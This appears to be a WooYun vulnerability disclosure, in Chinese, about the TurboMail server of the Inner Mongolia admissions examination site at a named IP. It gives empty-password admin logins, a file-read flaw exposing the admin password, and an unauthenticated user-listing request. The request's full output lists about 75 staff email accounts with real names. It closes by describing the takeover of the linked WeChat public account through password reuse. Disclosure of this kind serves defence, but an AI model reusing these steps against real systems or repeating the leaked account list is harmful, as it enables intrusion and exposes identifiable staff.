WooYun.org

内蒙古招生考试信息网http://116.113.33.130:8080 使用的TurboMail低版本
后台可以使用 sec_bm 或sec_sj 的空密码登陆（sec_bm密码改为 sec_bm）
使用读文件漏洞读得 管理员的密码为base64加密 破解进入后台

读取所有用户

/mailmain?intertype=ajax&type=getAllUserList_simple

{"ret_code":0,"users":[{"useraccount":"1c@zsks.cn","firstname":"1c"},{"useraccount":"23c@zsks.cn","firstname":"23c"},{"useraccount":"4c@zsks.cn","firstname":"4c"},{"useraccount":"admin@zsks.cn","firstname":"admin"},{"useraccount":"alt@zsks.cn","firstname":"阿拉塔"},{"useraccount":"aqi@zsks.cn","firstname":"阿其拉勒"},{"useraccount":"aruna@zsks.cn","firstname":"阿如娜"},{"useraccount":"arxjing@zsks.cn","firstname":"阿日新"},{"useraccount":"bgs@zsks.cn","firstname":"bgs"},{"useraccount":"bh@zsks.cn","firstname":"布和"},{"useraccount":"bse@zsks.cn","firstname":"包世恩"},{"useraccount":"bss@zsks.cn","firstname":"白双山"},{"useraccount":"bt@zsks.cn","firstname":"白涛"},{"useraccount":"bty@zsks.cn","firstname":"白托雅"},{"useraccount":"cf@zsks.cn","firstname":"蔡斐"},{"useraccount":"ck@zsks.cn","firstname":"陈凯"},{"useraccount":"dz@zsks.cn","firstname":"段志"},{"useraccount":"grl@zsks.cn","firstname":"格日乐"},{"useraccount":"honghong@zsks.cn","firstname":"红红"},{"useraccount":"hrf@zsks.cn","firstname":"韩荣飞"},{"useraccount":"jcs@zsks.cn","firstname":"jcs"},{"useraccount":"jhm@zsks.cn","firstname":"焦红梅"},{"useraccount":"jtw@zsks.cn","firstname":"贾汀微"},{"useraccount":"jyp@zsks.cn","firstname":"姜玉鹏"},{"useraccount":"jzg@zsks.cn","firstname":"贾治国"},{"useraccount":"kszx@zsks.cn","firstname":"kszx"},{"useraccount":"lby@zsks.cn","firstname":"李秉业"},{"useraccount":"ld@zsks.cn","firstname":"ld"},{"useraccount":"lhr@zsks.cn","firstname":"李海容"},{"useraccount":"litao@zsks.cn","firstname":"李涛"},{"useraccount":"liuf@zsks.cn","firstname":"刘斐"},{"useraccount":"liuyp@zsks.cn","firstname":"刘亚平"},{"useraccount":"lq@zsks.cn","firstname":"李卿"},{"useraccount":"lt@zsks.cn","firstname":"李彤"},{"useraccount":"lxf@zsks.cn","firstname":"刘小凤"},{"useraccount":"lyp@zsks.cn","firstname":"刘英萍"},{"useraccount":"miaozw@zsks.cn","firstname":"苗中文"},{"useraccount":"myp@zsks.cn","firstname":"米益平"},{"useraccount":"nobody@root","firstname":""},{"useraccount":"postmaster@root","firstname":""},{"useraccount":"qhl@zsks.cn","firstname":"乔惠莉"},{"useraccount":"qx@zsks.cn","firstname":"曲晓"},{"useraccount":"rjl@zsks.cn","firstname":"任俊莲"},{"useraccount":"sec_bm@root","firstname":""},{"useraccount":"sec_sj@root","firstname":""},{"useraccount":"shd@zsks.cn","firstname":"孙海东"},{"useraccount":"shl@zsks.cn","firstname":"孙慧莉"},{"useraccount":"sjh@zsks.cn","firstname":"史建华"},{"useraccount":"sl@zsks.cn","firstname":"尚利"},{"useraccount":"slt@zsks.cn","firstname":"孙立涛"},{"useraccount":"sly@zsks.cn","firstname":"苏林英"},{"useraccount":"ssj@zsks.cn","firstname":"孙淑娟"},{"useraccount":"sy@zsks.cn","firstname":"石岩"},{"useraccount":"txs@zsks.cn","firstname":"陶学书"},{"useraccount":"why@zsks.cn","firstname":"王鸿义"},{"useraccount":"wll@zsks.cn","firstname":"吴琳琳"},{"useraccount":"wm@zsks.cn","firstname":"伟明"},{"useraccount":"wp@zsks.cn","firstname":"王鹏"},{"useraccount":"wtm@zsks.cn","firstname":"王铁民"},{"useraccount":"wyn@zsks.cn","firstname":"王一囡"},{"useraccount":"wzc@zsks.cn","firstname":"王织春"},{"useraccount":"xhb@zsks.cn","firstname":"肖海波"},{"useraccount":"xxzx@zsks.cn","firstname":"xxzx"},{"useraccount":"xyh@zsks.cn","firstname":"许永和"},{"useraccount":"xyj@zsks.cn","firstname":"邢宜静"},{"useraccount":"yd@zsks.cn","firstname":"岳丹"},{"useraccount":"yy@zsks.cn","firstname":"云宇"},{"useraccount":"zcj@zsks.cn","firstname":"翟成珺"},{"useraccount":"zgl@zsks.cn","firstname":"张国亮"},{"useraccount":"zh@zsks.cn","firstname":"张华"},{"useraccount":"zpw@zsks.cn","firstname":"张培文"},{"useraccount":"zr@zsks.cn","firstname":"张瑞"},{"useraccount":"zwg@zsks.cn","firstname":"赵文光"},{"useraccount":"zwm@zsks.cn","firstname":"赵文明"},{"useraccount":"zzy@zsks.cn","firstname":"赵智赟"}]}
获取admin用户的密码
得知admin邮箱为微信平台邮箱

使用admin密码登陆微信平台 （不要使用一样的管理密码）

到这里邮箱系统 和微信公共号 沦陷 （一点猜测 邮箱使用的管理密码为通用密码 因为时间节点比较敏感 没有继续深入）
注：一些用户的初始密码为123456 已被人用来发送垃圾邮件